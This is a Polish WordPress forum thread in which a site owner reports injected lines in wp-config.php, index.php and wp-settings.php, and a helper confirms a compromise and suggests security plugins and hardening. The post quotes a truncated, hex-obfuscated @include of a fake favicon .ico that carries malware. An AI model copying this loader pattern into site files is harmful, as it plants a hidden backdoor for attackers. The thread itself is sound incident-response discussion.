Dziwne znaki w wp-config, index i wp-settings

  • bonson

    (@bonson)


    8 lat, 2 miesiące temu

    Przed jakąś godziną wtyczka Wordfence krzyknęła że są błędy w plikach:
    wp-config.php
    index.php
    wp-settings.php

    Gdy zacząłem przeglądać pliki zostały tam dodane linijki z dziwnymi znakami:
    np. w wp-config to:

    /*61e7f*/

@include "\x2f/\x77p\x2di\x6ec\x6cu\x64e\x73/\x53i\x6dp\x6ce\x50i\x65/\x43a\x63h\x65/\x66a\x76i\x63o\x6e_\x338...";

/*61e7f*/

    Nie podaje całego bo nie wiem co to może oznaczać.
    Może to zrobić jakaś wtyczka? czy to próba ataku na stronę? (wcześniejsza wersja strony była atakowana).

Zobacz 4 odpowiedzi - od 1 do 4 (z 4 łącznie)
  • Adam

    (@adamlachut)

    8 lat, 2 miesiące temu

    Nie próba, tylko skuteczny atak.
    Zaincludowany favicon_xxx.ico to w rzeczywistości plik ze złośliwym kodem – jeden z wielu.

    A.

    • Ta odpowiedź została zmodyfikowana 8 lat, 2 miesiące temu przez Adam.
    Twórca wątku bonson

    (@bonson)

    8 lat, 2 miesiące temu

    Jaką wtyczka najlepiej zainstalować aby w przyszłości uniknąć tego typu ataków?

    Najlepiej bezpłatna ale płatne też jak najbardziej mogą być.

    Adam

    (@adamlachut)

    8 lat, 2 miesiące temu

    Jeżeli usunąłeś infekcję i lukę, dzięki której ktoś uzyskał dostęp do Twojego serwera, to wg mnie optymalny zestaw to:
    – AllInOne WP Security: zmiana adresu zaplecza (żeby była skuteczna, powinieneś zablokować dostęp do xmlrpc.php i wp-login.php), dodatkowe reguły w .htaccess itp.
    – Wordfence – nawet w wersji darmowej sprawdzi sie jako WAF

    A.

    Twórca wątku bonson

    (@bonson)

    8 lat, 2 miesiące temu

    Infekcja usunięta ale niestety nie wiem gdzie jest luka :/.

Zobacz 4 odpowiedzi - od 1 do 4 (z 4 łącznie)

Temat ‘Dziwne znaki w wp-config, index i wp-settings’ jest zamknięty na nowe odpowiedzi.